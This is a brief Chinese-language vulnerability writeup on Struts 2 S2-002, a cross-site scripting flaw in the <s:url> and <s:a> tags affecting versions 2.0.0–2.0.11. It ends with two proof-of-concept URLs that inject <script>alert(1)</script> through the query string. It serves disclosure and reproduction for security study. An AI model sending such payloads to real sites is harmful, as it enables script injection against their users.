s2-002¶
一、漏洞简介¶
对于<s:url>和<s:a>标签,可以在构造和呈现标签的结果URL时注入不能正确转义的参数值。以下情况是已知的:
构造<s:a>结果中包含的参数值可以注入未转义的双引号,从而可以通过转义已渲染的href属性来在生成的HTML中注入代码。
当includeParams设置为“none”的任何其他值时,<s:url>和<s:a>标签无法转义<script>
二、漏洞影响¶
Struts 2.0.0 - Struts 2.0.11
三、复现过程¶
poc
http://url:8080/index.action?"><script>alert(1)</script><"
http://url:8080/index.action?<script>alert(1)</script>test=hello